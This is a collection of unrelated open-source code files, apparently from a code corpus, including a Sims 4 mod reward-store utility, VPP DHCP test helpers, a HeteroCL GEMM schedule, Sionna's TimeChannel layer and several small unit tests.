:rtype: bool
"""
return CommonSatisfactionRewardStoreUtils._remove_reward_from_rewards_store(reward_item_definition_id)
@staticmethod
def get_all_satisfaction_reward_store_items_generator(
include_satisfaction_reward_callback: Callable[[CommonSatisfactionRewardStoreItem], bool]=None
) -> Iterator[CommonSatisfactionRewardStoreItem]:
"""get_all_satisfaction_reward_store_items_generator(include_satisfaction_reward_callback=None)
Retrieve all Satisfaction Rewards in the Satisfaction Rewards Store.
        :param include_satisfaction_reward_callback: If the result of this callback is True, the Satisfaction Reward\
        and its Reward Data (Cost, Award Type) will be included in the results. If set to None, all Satisfaction Rewards will be included.
        :type include_satisfaction_reward_callback: Callable[[CommonSatisfactionRewardStoreItem], bool], optional
:return: All items from the satisfaction reward store.
:rtype: Iterator[CommonSatisfactionRewardStoreItem]
"""
satisfaction_reward_store_items: Dict[Reward, Tuple[int, WhimsTracker.WhimAwardTypes]] = dict(WhimsTracker.SATISFACTION_STORE_ITEMS)
        for (reward, data) in satisfaction_reward_store_items.items():
reward_cost = data[0]
reward_type = data[1]
reward_store_item = CommonSatisfactionRewardStoreItem(reward, reward_cost, reward_type)
if include_satisfaction_reward_callback is not None and not include_satisfaction_reward_callback(reward_store_item):
continue
yield reward_store_item
@staticmethod
def _add_reward_to_rewards_store(reward_definition_id: int, reward_point_cost: int, reward_type: WhimsTracker.WhimAwardTypes) -> bool:
sim_reward_instance = CommonSatisfactionRewardStoreUtils._load_reward_instance(reward_definition_id)
if sim_reward_instance is None:
return False
sim_reward_data_immutable_slots_cls = sims4.collections.make_immutable_slots_class(['cost', 'award_type'])
reward_data = sim_reward_data_immutable_slots_cls(dict(cost=reward_point_cost, award_type=reward_type))
store_items = dict(WhimsTracker.SATISFACTION_STORE_ITEMS)
store_items[sim_reward_instance] = reward_data
WhimsTracker.SATISFACTION_STORE_ITEMS = sims4.collections.FrozenAttributeDict(store_items)
return True
@staticmethod
def _remove_reward_from_rewards_store(reward_definition_id: int) -> bool:
sim_reward_instance = CommonSatisfactionRewardStoreUtils._load_reward_instance(reward_definition_id)
if sim_reward_instance is None:
return False
store_items = dict(WhimsTracker.SATISFACTION_STORE_ITEMS)
if sim_reward_instance in store_items:
del store_items[sim_reward_instance]
WhimsTracker.SATISFACTION_STORE_ITEMS = sims4.collections.FrozenAttributeDict(store_items)
return True
@staticmethod
def _load_reward_instance(reward_definition_id: int) -> Reward:
return CommonResourceUtils.load_instance(Types.REWARD, reward_definition_id)
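# Hedged usage sketch: the decimal identifier below (1234567890) is a placeholder,
# not a real reward trait id; substitute the id of an actual reward trait tuning instance.
def _example_offer_trait_for_500_points() -> bool:
    return CommonSatisfactionRewardStoreUtils.add_reward_trait_to_rewards_store(1234567890, 500)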
|
src/plugins/dhcp/test/vpp_dhcp.py | amithbraj/vpp | 751 | 12671907 | from vpp_object import VppObject
class VppDHCPProxy(VppObject):
def __init__(
self,
test,
dhcp_server,
dhcp_src_address,
rx_vrf_id=0,
server_vrf_id=0,
):
self._test = test
self._rx_vrf_id = rx_vrf_id
self._server_vrf_id = server_vrf_id
self._dhcp_server = dhcp_server
self._dhcp_src_address = dhcp_src_address
def set_proxy(
self,
dhcp_server,
dhcp_src_address,
rx_vrf_id=0,
server_vrf_id=0):
if self.query_vpp_config():
raise Exception('Vpp config present')
self._rx_vrf_id = rx_vrf_id
self._server_vrf_id = server_vrf_id
self._dhcp_server = dhcp_server
self._dhcp_src_address = dhcp_src_address
def add_vpp_config(self):
self._test.vapi.dhcp_proxy_config(
is_add=1,
rx_vrf_id=self._rx_vrf_id,
server_vrf_id=self._server_vrf_id,
dhcp_server=self._dhcp_server,
dhcp_src_address=self._dhcp_src_address)
self._test.registry.register(self, self._test.logger)
def remove_vpp_config(self):
self._test.vapi.dhcp_proxy_config(
rx_vrf_id=self._rx_vrf_id,
server_vrf_id=self._server_vrf_id,
dhcp_server=self._dhcp_server,
dhcp_src_address=self._dhcp_src_address,
is_add=0)
def get_vpp_dump(self):
dump = self._test.vapi.dhcp_proxy_dump()
for entry in dump:
if entry.rx_vrf_id == self._rx_vrf_id:
return entry
def query_vpp_config(self):
dump = self.get_vpp_dump()
return True if dump else False
def object_id(self):
return "dhcp-proxy-%d" % self._rx_vrf_id
class VppDHCPClient(VppObject):
def __init__(
self,
test,
sw_if_index,
hostname,
id=None,
want_dhcp_event=False,
set_broadcast_flag=True,
dscp=None,
pid=None):
self._test = test
self._sw_if_index = sw_if_index
self._hostname = hostname
self._id = id
self._want_dhcp_event = want_dhcp_event
self._set_broadcast_flag = set_broadcast_flag
self._dscp = dscp
self._pid = pid
def set_client(
self,
sw_if_index,
hostname,
id=None,
want_dhcp_event=False,
set_broadcast_flag=True,
dscp=None,
pid=None):
if self.query_vpp_config():
raise Exception('Vpp config present')
self._sw_if_index = sw_if_index
self._hostname = hostname
self._id = id
self._want_dhcp_event = want_dhcp_event
self._set_broadcast_flag = set_broadcast_flag
self._dscp = dscp
self._pid = pid
def add_vpp_config(self):
id = self._id.encode('ascii') if self._id else None
client = {'sw_if_index': self._sw_if_index, 'hostname': self._hostname,
'id': id,
'want_dhcp_event': self._want_dhcp_event,
'set_broadcast_flag': self._set_broadcast_flag,
'dscp': self._dscp, 'pid': self._pid}
self._test.vapi.dhcp_client_config(is_add=1, client=client)
self._test.registry.register(self, self._test.logger)
def remove_vpp_config(self):
        client = {
'sw_if_index': self._sw_if_index,
'hostname': self._hostname}
self._test.vapi.dhcp_client_config(client=client, is_add=0)
def get_vpp_dump(self):
dump = self._test.vapi.dhcp_client_dump()
for entry in dump:
if entry.client.sw_if_index == self._sw_if_index:
return entry
def query_vpp_config(self):
dump = self.get_vpp_dump()
return True if dump else False
def object_id(self):
return "dhcp-client-%s/%d" % (self._hostname, self._sw_if_index)
|
xautodl/datasets/math_core.py | Joey61Liuyi/AutoDL-Projects | 817 | 12671924 | #####################################################
# Copyright (c) <NAME> [GitHub D-X-Y], 2021.05 #
#####################################################
from .math_static_funcs import (
LinearSFunc,
QuadraticSFunc,
CubicSFunc,
QuarticSFunc,
ConstantFunc,
ComposedSinSFunc,
ComposedCosSFunc,
)
from .math_dynamic_funcs import (
LinearDFunc,
QuadraticDFunc,
SinQuadraticDFunc,
BinaryQuadraticDFunc,
)
from .math_dynamic_generator import UniformDGenerator, GaussianDGenerator
|
packs/consul/actions/query_node.py | userlocalhost2000/st2contrib | 164 | 12671949 | <gh_stars>100-1000
from lib import action
class ConsulQueryNodeAction(action.ConsulBaseAction):
def run(self, node):
index, node = self.consul.catalog.node(node)
return node
|
flextensor/testing/others/hand-craft/schedule_gemm_vhls.py | imxian/FlexTensor | 135 | 12671955 | import heterocl as hcl
def kernel_gemm(A, B):
k = hcl.reduce_axis(0, A.shape[1], "k")
return hcl.compute(
(A.shape[0], B.shape[1]),
lambda i, j: hcl.sum(A[i, k] * B[k, j], axis=k),
"C")
def main():
M = 512
N = 512
K = 512
A = hcl.placeholder((M, K), dtype="float32", name="A")
B = hcl.placeholder((K, N), dtype="float32", name="B")
s = hcl.create_schedule([A, B], kernel_gemm)
# split
C = kernel_gemm.C
m, n, k = s[C].op.axis
mo, mi = s[C].split(m, factor=16)
no, ni = s[C].split(n, factor=32)
ko, ki = s[C].split(k, factor=8)
# reorder shuffle
s[C].reorder(mo, no, mi, ni, ko, ki)
# reorder local
s[C].reorder(mi, ko, ki, ni)
# reshape
s.reshape(C, [512//16, 16, 512//32, 32])
# partition
s.partition(A, dim=3)
# pipeline
s[C].pipeline(mi)
# reuse_at
# nothing to do
print(hcl.build(s, target="vhls"))
if __name__ == "__main__":
main()
"""
// result:
#include <ap_int.h>
#include <ap_fixed.h>
#include <math.h>
void default_function(float A[512][512], float B[512][512], ap_int<32> C[32][16][16][32]) {
#pragma HLS array_partition variable=A complete dim=3
for (ap_int<32> i_outer = 0; i_outer < 32; ++i_outer) {
for (ap_int<32> j_outer = 0; j_outer < 16; ++j_outer) {
for (ap_int<32> i_inner = 0; i_inner < 16; ++i_inner) {
#pragma HLS pipeline
for (ap_int<32> k_outer = 0; k_outer < 64; ++k_outer) {
ap_int<32> sum;
sum = 0;
for (ap_int<32> k_inner = 0; k_inner < 8; ++k_inner) {
for (ap_int<32> j_inner = 0; j_inner < 32; ++j_inner) {
sum = ((ap_int<32>)((A[(i_inner + (i_outer * 16))][(k_inner + (k_outer * 8))] * B[(k_inner + (k_outer * 8))][(j_inner + (j_outer * 32))]) + ((float)sum)));
}
}
C[i_outer][i_inner][j_outer][j_inner] = sum;
}
}
}
}
""" |
raiden/tests/unit/utils/test_formatting.py | tirkarthi/raiden | 2,101 | 12671998 | import os
from eth_utils import to_checksum_address as eth_utils_checksum
from raiden.utils.formatting import to_checksum_address
from raiden.utils.typing import Address
def test_random_addresses():
for _ in range(100):
address_bytes = Address(os.urandom(20))
assert eth_utils_checksum(address_bytes) == to_checksum_address(address_bytes)
|
sionna/channel/time_channel.py | NVlabs/sionna | 163 | 12672006 | #
# SPDX-FileCopyrightText: Copyright (c) 2021-2022 NVIDIA CORPORATION & AFFILIATES. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
#
"""Layer for implementing the channel in the time domain"""
import tensorflow as tf
from . import GenerateTimeChannel, ApplyTimeChannel
from .utils import time_lag_discrete_time_channel
class TimeChannel(tf.keras.layers.Layer):
# pylint: disable=line-too-long
r"""TimeChannel(channel_model, bandwidth, num_time_samples, maximum_delay_spread=3e-6, l_min=None, l_max=None, normalize_channel=False, add_awgn=True, return_channel=False, dtype=tf.complex64, **kwargs)
Generate channel responses and apply them to channel inputs in the time domain.
This class inherits from the Keras `Layer` class and can be used as layer
in a Keras model.
The channel output consists of ``num_time_samples`` + ``l_max`` - ``l_min``
time samples, as it is the result of filtering the channel input of length
``num_time_samples`` with the time-variant channel filter of length
``l_max`` - ``l_min`` + 1. In the case of a single-input single-output link and given a sequence of channel
inputs :math:`x_0,\cdots,x_{N_B}`, where :math:`N_B` is ``num_time_samples``, this
layer outputs
.. math::
y_b = \sum_{\ell = L_{\text{min}}}^{L_{\text{max}}} x_{b-\ell} \bar{h}_{b,\ell} + w_b
where :math:`L_{\text{min}}` corresponds ``l_min``, :math:`L_{\text{max}}` to ``l_max``, :math:`w_b` to
the additive noise, and :math:`\bar{h}_{b,\ell}` to the
:math:`\ell^{th}` tap of the :math:`b^{th}` channel sample.
This layer outputs :math:`y_b` for :math:`b` ranging from :math:`L_{\text{min}}` to
:math:`N_B + L_{\text{max}} - 1`, and :math:`x_{b}` is set to 0 for :math:`b < 0` or :math:`b \geq N_B`.
The channel taps :math:`\bar{h}_{b,\ell}` are computed assuming a sinc filter
is used for pulse shaping and receive filtering. Therefore, given a channel impulse response
:math:`(a_{m}(t), \tau_{m}), 0 \leq m \leq M-1`, generated by the ``channel_model``,
the channel taps are computed as follows:
.. math::
\bar{h}_{b, \ell}
= \sum_{m=0}^{M-1} a_{m}\left(\frac{b}{W}\right)
\text{sinc}\left( \ell - W\tau_{m} \right)
for :math:`\ell` ranging from ``l_min`` to ``l_max``, and where :math:`W` is
the ``bandwidth``.
For multiple-input multiple-output (MIMO) links, the channel output is computed for each antenna of each receiver and by summing over all the antennas of all transmitters.
Parameters
----------
channel_model : :class:`~sionna.channel.ChannelModel` object
An instance of a :class:`~sionna.channel.ChannelModel`, such as
:class:`~sionna.channel.RayleighBlockFading` or
:class:`~sionna.channel.tr38901.UMi`.
bandwidth : float
Bandwidth (:math:`W`) [Hz]
num_time_samples : int
Number of time samples forming the channel input (:math:`N_B`)
maximum_delay_spread : float
Maximum delay spread [s].
Used to compute the default value of ``l_max`` if ``l_max`` is set to
`None`. If a value is given for ``l_max``, this parameter is not used.
It defaults to 3us, which was found
to be large enough to include most significant paths with all channel
models included in Sionna assuming a nominal delay spread of 100ns.
l_min : int
Smallest time-lag for the discrete complex baseband channel (:math:`L_{\text{min}}`).
If set to `None`, defaults to the value given by :func:`time_lag_discrete_time_channel`.
l_max : int
Largest time-lag for the discrete complex baseband channel (:math:`L_{\text{max}}`).
If set to `None`, it is computed from ``bandwidth`` and ``maximum_delay_spread``
using :func:`time_lag_discrete_time_channel`. If it is not set to `None`,
then the parameter ``maximum_delay_spread`` is not used.
add_awgn : bool
If set to `False`, no white Gaussian noise is added.
Defaults to `True`.
normalize_channel : bool
If set to `True`, the channel is normalized over the block size
to ensure unit average energy per time step. Defaults to `False`.
return_channel : bool
If set to `True`, the channel response is returned in addition to the
channel output. Defaults to `False`.
dtype : tf.DType
Complex datatype to use for internal processing and output.
Defaults to `tf.complex64`.
Input
-----
(x, no) or x:
Tuple or Tensor:
x : [batch size, num_tx, num_tx_ant, num_time_samples], tf.complex
Channel inputs
no : Scalar or Tensor, tf.float
Scalar or tensor whose shape can be broadcast to the shape of the
channel outputs: [batch size, num_rx, num_rx_ant, num_time_samples].
Only required if ``add_awgn`` is set to `True`.
The noise power ``no`` is per complex dimension. If ``no`` is a scalar,
noise of the same variance will be added to the outputs.
If ``no`` is a tensor, it must have a shape that can be broadcast to
the shape of the channel outputs. This allows, e.g., adding noise of
different variance to each example in a batch. If ``no`` has a lower
rank than the channel outputs, then ``no`` will be broadcast to the
shape of the channel outputs by adding dummy dimensions after the last
axis.
Output
-------
y : [batch size, num_rx, num_rx_ant, num_time_samples + l_max - l_min], tf.complex
Channel outputs
The channel output consists of ``num_time_samples`` + ``l_max`` - ``l_min``
time samples, as it is the result of filtering the channel input of length
``num_time_samples`` with the time-variant channel filter of length
``l_max`` - ``l_min`` + 1.
h_time : [batch size, num_rx, num_rx_ant, num_tx, num_tx_ant, num_time_samples + l_max - l_min, l_max - l_min + 1], tf.complex
(Optional) Channel responses. Returned only if ``return_channel``
is set to `True`.
For each batch example, ``num_time_samples`` + ``l_max`` - ``l_min`` time
steps of the channel realizations are generated to filter the channel input.
"""
def __init__(self, channel_model, bandwidth, num_time_samples,
maximum_delay_spread=3e-6, l_min=None, l_max=None,
normalize_channel=False, add_awgn=True, return_channel=False,
dtype=tf.complex64, **kwargs):
super().__init__(trainable=False, dtype=dtype, **kwargs)
# Setting l_min and l_max to default values if not given by the user
l_min_default, l_max_default = time_lag_discrete_time_channel(bandwidth,
maximum_delay_spread)
if l_min is None:
l_min = l_min_default
if l_max is None:
l_max = l_max_default
self._cir_sampler = channel_model
self._bandwidth = bandwidth
self._num_time_steps = num_time_samples
self._l_min = l_min
self._l_max = l_max
self._l_tot = l_max-l_min+1
self._normalize_channel = normalize_channel
self._add_awgn = add_awgn
self._return_channel = return_channel
def build(self, input_shape): #pylint: disable=unused-argument
self._generate_channel = GenerateTimeChannel(self._cir_sampler,
self._bandwidth,
self._num_time_steps,
self._l_min,
self._l_max,
self._normalize_channel)
self._apply_channel = ApplyTimeChannel( self._num_time_steps,
self._l_tot,
self._add_awgn,
tf.as_dtype(self.dtype))
def call(self, inputs):
if self._add_awgn:
x, no = inputs
else:
x = inputs
h_time = self._generate_channel(tf.shape(x)[0])
if self._add_awgn:
y = self._apply_channel([x, h_time, no])
else:
y = self._apply_channel([x, h_time])
if self._return_channel:
return y, h_time
else:
return y
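# Hedged usage sketch (illustrative parameter values only): apply a time-domain
# channel with a Rayleigh block-fading model to a batch of random baseband inputs.
def _example_time_channel():
    from sionna.channel import RayleighBlockFading  # local import to avoid a circular import
    rayleigh = RayleighBlockFading(num_rx=1, num_rx_ant=1, num_tx=1, num_tx_ant=1)
    channel = TimeChannel(rayleigh, bandwidth=30.72e6, num_time_samples=1024,
                          return_channel=True)
    # x: [batch size, num_tx, num_tx_ant, num_time_samples]
    x = tf.complex(tf.random.normal([8, 1, 1, 1024]),
                   tf.random.normal([8, 1, 1, 1024]))
    no = 0.1  # noise power per complex dimension
    y, h_time = channel([x, no])
    return y, h_time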
|
tests/unit/modules/test_zenoss.py | babs/salt | 9,425 | 12672007 | import salt.modules.config as config
import salt.modules.zenoss as zenoss
from tests.support.mixins import LoaderModuleMockMixin
from tests.support.mock import MagicMock, call, patch
from tests.support.unit import TestCase
class ZenossTestCase(TestCase, LoaderModuleMockMixin):
"""
    Test cases for salt.modules.zenoss
"""
def setup_loader_modules(self):
return {
zenoss: {"__salt__": {"config.option": config.option}},
config: {"__opts__": {}},
}
def test_zenoss_session(self):
"""
test zenoss._session when using verify_ssl
"""
zenoss_conf = {
"zenoss": {
"hostname": "https://test.zenoss.com",
"username": "admin",
"password": "<PASSWORD>",
}
}
for verify in [True, False, None]:
zenoss_conf["zenoss"]["verify_ssl"] = verify
if verify is None:
zenoss_conf["zenoss"].pop("verify_ssl")
verify = True
patch_opts = patch.dict(config.__opts__, zenoss_conf)
mock_http = MagicMock(return_value=None)
patch_http = patch("salt.utils.http.session", mock_http)
with patch_http, patch_opts:
zenoss._session()
self.assertEqual(
mock_http.call_args_list,
[
call(
ca_bundle=None,
headers={"Content-type": "application/json; charset=utf-8"},
password="<PASSWORD>",
user="admin",
verify_ssl=verify,
)
],
)
|